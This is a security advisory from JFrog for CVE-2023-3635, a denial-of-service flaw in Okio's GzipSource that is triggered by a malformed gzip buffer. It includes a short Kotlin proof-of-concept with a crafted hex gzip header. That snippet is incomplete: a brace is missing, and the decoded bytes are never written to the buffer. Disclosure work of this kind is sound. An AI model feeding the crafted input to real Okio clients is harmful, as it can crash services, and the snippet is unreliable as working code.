JFrog Security Research
< Back

XRAY-589879 - Okio GzipSource unhandled exception Denial of Service

CVE-2023-3635 | CVSS 5.9

JFrog Severity:medium

Discovered ByUriya Yavnieliof the JFrog Security Research Team

Published 12 Jul, 2023 | Last updated 12 Jul, 2023

Okio GzipSource unhandled exception Denial of Service



GzipSource does not handle an exception that might be raised when parsing a malformed gzip buffer. This may lead to denial of service of the Okio client when handling a crafted GZIP archive, by using the GzipSource class.

val gzBuf: Buffer = Buffer()
    try {
        val gzByteString: ByteString = ("1f8b41ff424242424343ffff").decodeHex()
        val gz: GzipSource = GzipSource(gzBuf)
        val sinkBuf: Buffer = Buffer()
        gz.read(sinkBuf, 5)
    catch(e: IOException) {
        println("got error: " + e.toString())

No mitigations are supplied for this issue


< Back